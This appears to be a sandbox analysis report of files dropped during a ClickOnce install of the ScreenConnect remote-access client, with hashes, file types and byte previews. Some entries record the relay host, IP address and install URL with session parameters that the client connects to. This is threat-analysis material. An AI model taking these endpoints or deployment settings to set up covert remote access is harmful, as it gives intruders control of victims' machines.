                                                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2203
                                                                                                                                                                                                                                                Entropy (8bit):4.678633020120548
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHA:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHm
                                                                                                                                                                                                                                                MD5:5556CAB5FCC902DF0AB1D873B4C86E6A
                                                                                                                                                                                                                                                SHA1:A8DCA7F01984B86DD0D73D4D9BBB629A71F42960
                                                                                                                                                                                                                                                SHA-256:15CDDBF50CA1B23951048857088AC35D5FBBEE6BFC9523676152CF42E291CC95
                                                                                                                                                                                                                                                SHA-512:C50D88DF2599BB636C9C2F888958A682266527C33DA2CC0355F8135DB04E5440DD85DA9A66F53F2AE3EB086E6013C92EB626C0BBEBCD13DCD1F34DF731E444CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):569
                                                                                                                                                                                                                                                Entropy (8bit):5.0687349524326955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO4Y3IEm/vXbAa3xT:2dL9hK6E46YPzz8vH
                                                                                                                                                                                                                                                MD5:E374D37801CDEBE01DF27991F13BD78B
                                                                                                                                                                                                                                                SHA1:15FEBACF5CEB5FFB501A6ABD6384A85D625A066E
                                                                                                                                                                                                                                                SHA-256:71E7E3F4972BDD4CB98809973064F0A34A7E2377CC48E3C50017BA622E35F446
                                                                                                                                                                                                                                                SHA-512:BAFADD7B56FFAD46D64B01D860D4A269D65AD294C45BC7520F667DF5CAB2B5104DDC90E0FCD34A531093884349F349E96B5CF10344BAE261BEBD108166FCBCAE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>0bd0.adrsxpjm0rga0n.de=104.168.134.232-22%2f12%2f2024%2011%3a47%3a44</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1373
                                                                                                                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                                                                Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (651), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15204
                                                                                                                                                                                                                                                Entropy (8bit):3.8085344828723042
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:t6BKRJdMrXUknJGDYUBBaOy0l6JdMrXUknJGD/DS8/58Ok/sJdMrXUknJGDYT/aD:+7UknJzUa27UknJQ3o7UknJ/lLEv
                                                                                                                                                                                                                                                MD5:28D207908A74807481138D0381461051
                                                                                                                                                                                                                                                SHA1:71E0126BE6433F7A7C01931391431B70FD9E1460
                                                                                                                                                                                                                                                SHA-256:602D66FA30B7098183AFB2EE5103A14AA00CEC84AD9CC130E69C4008E773F265
                                                                                                                                                                                                                                                SHA-512:71E7B5CBEC66665B2E502C023ABBBFE5B9CB622AC7B9DAD9C82824658DADAD52D6AE73113DC03CF567627CECA1BED51ECCAF888C609B9AE302B25BDF21407E77
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.r.e.a...a.l.a.r.m.a.s.d.e.l.s.u.r.e.s.t.e...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.0.b.d.0...a.d.r.s.x.p.j.m.0.r.g.a.0.n...d.e.&.p.=.8.0.4.1.&.s.=.1.2.a.6.2.7.9.1.-.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117905
                                                                                                                                                                                                                                                Entropy (8bit):5.586337100898901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:0aN8cT51/FXvMVNWfCXq9ymhm2o9HuzhJOvP:0VcfiVI3mt8vOvP
                                                                                                                                                                                                                                                MD5:A4FE50A6C913DF40834230E7ABF10CE9
                                                                                                                                                                                                                                                SHA1:AD8C36976A5D33D1A4DE1A55F4598828C0F41A0A
                                                                                                                                                                                                                                                SHA-256:66CB8DCE9EB73D465B607088654C44D55002013B41069F74FDFF9AD42EF7AB2A
                                                                                                                                                                                                                                                SHA-512:200DCADA2C2F936E0E41B9AAF918F1F85F57D7E7388465DC8DD01E47EC2C52D28BD7BBD2B58FBA72C6040253BF5968ADAD49762F3252E45C8A842622956EB9EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
